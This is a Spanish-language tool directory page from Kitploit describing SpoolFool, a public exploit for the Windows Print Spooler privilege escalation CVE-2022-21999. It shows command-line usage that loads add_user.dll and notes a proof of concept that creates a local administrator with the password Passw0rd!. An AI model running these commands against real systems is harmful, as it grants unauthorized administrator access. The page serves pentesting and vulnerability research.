Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
SpoolFool — Exploit para CVE-2022-21999 - Windows Print Spooler Elevation of Privilege Vulnerability (LPE) | Kitploit
Herramientas/GitHubGitHub/ly4k/spoolfool
Escalada de PrivilegiosAnálisis de VulnerabilidadesExplotaciónPruebas de PenetraciónExplotación de Binarios
GitHubly4k/spoolfool

SpoolFool

Exploit para CVE-2022-21999 - Windows Print Spooler Elevation of Privilege Vulnerability (LPE)

Ver Repositorio
796160hace 4 añosRevisado por Kitploit

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir
Sitio web

SpoolFool

Exploit para CVE-2022-21999 - Vulnerabilidad de Elevación de Privilegios del Print Spooler de Windows (LPE)

Detalles

El exploit proporcionado debería funcionar por defecto en todas las versiones de escritorio de Windows.

Consulte la publicación del blog para obtener todos los detalles técnicos aquí.

Uso

root@kitploit:~
PS C:\SpoolFool> .\SpoolFool.exe

SpoolFool
  By Oliver Lyak (@ly4k_)

Examples:
  C:\SpoolFool\SpoolFool.exe -dll add_user.dll
  C:\SpoolFool\SpoolFool.exe -dll add_user.dll -printer 'My Printer'
  C:\SpoolFool\SpoolFool.exe -dll add_user.dll -dir 'SECRET'
  C:\SpoolFool\SpoolFool.exe -dll add_user.dll -printer 'My Printer' -dir 'SECRET'

Powershell

root@kitploit:~
PS C:\SpoolFool> ipmo .\SpoolFool.ps1
PS C:\SpoolFool> Invoke-SpoolFool

SpoolFool
  By Oliver Lyak (@ly4k_)

Examples:
   -dll add_user.dll
   -dll add_user.dll -printer 'My Printer'
   -dll add_user.dll -dir 'SECRET'
   -dll add_user.dll -printer 'My Printer' -dir 'SECRET'

Prueba de Concepto

La siguiente PoC utiliza una DLL que crea un nuevo administrador local admin / Passw0rd!. La DLL (AddUser.dll) y el código fuente se pueden encontrar en este repositorio.

Segunda ejecución

La siguiente PoC muestra una segunda ejecución del exploit proporcionado. Nótese que esta vez no se explota la vulnerabilidad para cargar la DLL.

Artefactos

Después de ejecutar el exploit, quedarán los siguientes artefactos para su limpieza posterior:

  • El directorio del controlador de impresora creado no se elimina
  • La DLL de payload se copia al directorio del controlador de impresora y no se elimina
  • Cualquier impresora creada no se elimina
  • El valor SpoolDirectory de la impresora objetivo no se restaura

Autores

  • Oliver Lyak @ly4k_

Referencias

  • SpoolFool: Windows Print Spooler Privilege Escalation (CVE-2022-21999)
Descargar herramienta